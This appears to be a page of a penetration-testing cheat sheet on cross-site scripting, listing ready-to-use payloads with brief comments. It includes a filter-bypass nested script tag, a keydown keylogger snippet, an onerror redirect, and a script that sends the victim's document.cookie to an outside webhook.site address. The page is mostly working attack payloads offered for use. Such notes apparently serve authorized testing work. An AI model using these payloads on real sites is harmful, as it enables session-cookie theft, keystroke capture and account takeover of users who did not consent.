XSS

TRY USING DOUBLE ENCODING LIKE THE URL, BASE64, ETC

alert(1)

print()

prompt("hello")
# everytime you will click a letter will be recorded in the console
function logKey(event){console.log(event.key)}

document.addEventListener("keydown",logKey)
# Test for HTML injection
# See if it stored XSS
<h1>test</h1>
# Stored XSS
<script>prompt(1)</script>

# It will remove the first <script> 
# They it will execute the xss payload
# Also check it is recursively removing the script tag
<scri<script>pt>prompt(1)</scri</script>pt>
# Stored XSS
<script>alert(document.cookie)</script>
# It will redirect to google.com
<img src=x onerror="window.location.href='https://google.com'">

# It will spawn the prompt 
# Which indicates we have xss
<img src=x onerror=prompt()>
<script>var i = new Image; i.src="https://webhook.site/b5ffbf17-8bfe-4b0f-8361-2d5d4ed67a83/?"+ document.cookie;</script>
PreviousLFI/RFINextSQLi

Last updated